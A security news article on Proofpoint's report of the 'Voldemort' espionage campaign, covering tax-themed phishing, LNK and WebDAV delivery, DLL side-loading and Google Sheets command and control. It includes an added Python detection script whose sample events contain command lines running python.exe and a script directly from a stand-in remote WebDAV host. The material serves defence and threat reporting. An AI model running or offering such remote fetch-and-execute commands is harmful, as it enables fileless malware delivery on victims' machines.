Cybersecurity researchers have discovered a new malware campaign that uses Google Sheets as its command-and-control (C2) mechanism.
The activity, revealed by Proofpoint and starting on August 5, 2024, impersonates the tax authorities of governments in Europe, Asia and the US in order to target more than 70 organizations worldwide with a custom tool called Voldemort, which is equipped to collect information and deliver additional payloads.
Target sectors include insurance, aerospace, transportation, academia, finance, technology, manufacturing, healthcare, automotive, hospitality, energy, government, media, telecommunications and welfare organizations.
The suspected cyber espionage campaign has not been attributed to a specific threat actor. About 20,000 email messages were sent as part of the attacks.
These emails purport to originate from tax authorities in the US, UK, France, Germany, Italy, India and Japan, informing recipients of changes to their tax returns and urging them to click on Google AMP Cache URLs that redirect users to an intermediate landing page.
The landing page checks the User-Agent string to determine whether the operating system is Windows and, if so, uses the search-ms: URI protocol handler to display a Windows Shortcut (LNK) file disguised as an Adobe Acrobat Reader PDF, in an attempt to trick the victim into launching it.
“When the LNK is executed, it will call PowerShell to run Python.exe from the third WebDAV share on the same tunnel (\library\), passing the Python script on the fourth share (\resources\) on the same host as the argument,” said Proofpoint researchers Tommy Madjar, Pim Trouerbach and Selena Larson.
“This forces Python to run the script without downloading the files to the computer, and the dependencies are downloaded directly from the WebDAV share.”
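A defender-side illustration of the chain just described, added here and not part of Proofpoint's report or this article: it scans constructed Windows process-creation records for a script interpreter launched by a shell straight from a remote WebDAV/UNC share, which is exactly the fileless step the researchers describe. The hostnames, paths and script names below are made up.

```python
import re

# Constructed Windows process-creation events (not real telemetry), modelled on the
# chain reported above: LNK -> PowerShell -> python.exe run straight from a WebDAV share.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden \\tunnel.example.invalid@SSL\DavWWWRoot\library\python.exe"
                r" \\tunnel.example.invalid@SSL\DavWWWRoot\resources\stage1.py"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"\\tunnel.example.invalid@SSL\DavWWWRoot\library\python.exe",
     "cmdline": r"python.exe \\tunnel.example.invalid@SSL\DavWWWRoot\resources\stage1.py"},
    {"parent": r"C:\Windows\explorer.exe",          # benign local developer activity
     "image": r"C:\Python312\python.exe",
     "cmdline": r"python.exe C:\Users\alice\build.py"},
]

# A UNC path to a remote host, including the WebDAV mini-redirector form \\host@SSL\DavWWWRoot\...
UNC_RE = re.compile(r"\\\\[\w.\-]+(?:@SSL)?(?:@\d+)?\\[^\s\"']+", re.IGNORECASE)
INTERPRETERS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_EXT = (".py", ".js", ".vbs", ".hta", ".ps1")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze_event(ev):
    """Return the reasons a single event matches the remote-share interpreter pattern."""
    reasons = []
    image, parent = basename(ev["image"]), basename(ev["parent"])
    if image in INTERPRETERS and UNC_RE.search(ev["image"]):
        reasons.append("interpreter binary loaded from a remote share")
    if parent in SHELLS and image in INTERPRETERS:
        reasons.append("interpreter spawned by a command shell")
    remote = [p for p in UNC_RE.findall(ev["cmdline"])
              if basename(p) in INTERPRETERS or p.lower().endswith(SCRIPT_EXT)]
    if remote:
        reasons.append("command line references remote interpreter/script: " + ", ".join(remote))
    return reasons

def flag_events(events):
    """Map event index -> reasons for every event that deserves an analyst's attention."""
    return {i: r for i, ev in enumerate(events) if (r := analyze_event(ev))}

if __name__ == "__main__":
    for i, reasons in flag_events(SAMPLE_EVENTS).items():
        print(f"event {i}: " + "; ".join(reasons))
```

The same three checks translate directly into an EDR or SIEM rule on Sysmon Event ID 1 (or Security 4688) fields; the local build.py run is left unflagged to show the pattern keys on the remote-share origin rather than on python.exe itself.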
The Python script is designed to collect system information and send the data as a Base64-encoded string to an actor-controlled domain, after which it displays a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive.
The ZIP archive, for its part, contains two files: a legitimate “CiscoCollabHost.exe” executable that is susceptible to DLL side-loading, and a malicious “CiscoSparkLauncher.dll” (i.e., Voldemort) that it side-loads.
Voldemort is a custom backdoor written in C that comes with capabilities to collect information and download next-stage payloads, with the malware using Google Sheets for C2, for exfiltrating stolen data and for receiving commands from its operators.
Proofpoint described the activity as aligned with advanced persistent threats (APTs), but carrying a “cybercriminal atmosphere” due to the use of techniques popular in cybercrime.
“Threat actors abuse file scheme URIs to access external file sharing resources to host malware, specifically WebDAV and Server Message Block (SMB). This is done by using the ‘file://’ scheme and pointing to the remote server that hosts the malicious content,” the researchers said.
This approach has become increasingly common among malware families that act as Initial Access Brokers (IABs), such as A thief, DarkGate and XWorm.
Additionally, Proofpoint said it was able to read the contents of the Google Sheet, identifying a total of six victims, including one believed to be either a sandbox or a “known researcher.”
The campaign has been described as unusual, raising the possibility that the threat actors cast a wide net before narrowing in on a small group of targets. It is also possible that the attackers, probably with varying levels of technical expertise, planned to infect multiple organizations.
“While many of the campaign’s characteristics are consistent with cybercriminal threats, we believe it is likely espionage in support of as-yet-unknown end goals,” the researchers said.
“The Frankensteinian amalgamation of intelligent and sophisticated capabilities combined with rudimentary methods and functionality makes it difficult to assess the capability level of a threat actor and pinpoint the ultimate campaign objectives with high confidence.”
The development comes after Netskope Threat Labs discovered an updated version of Latrodectus (version 1.4) that comes with a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.
“Latrodectus has evolved quite quickly, adding new features to its payload,” said security researcher Leandro Froes. “Understanding the updates that are applied to the payload allows defenders to maintain automated pipelines appropriately, and to use the information to further explore new options.”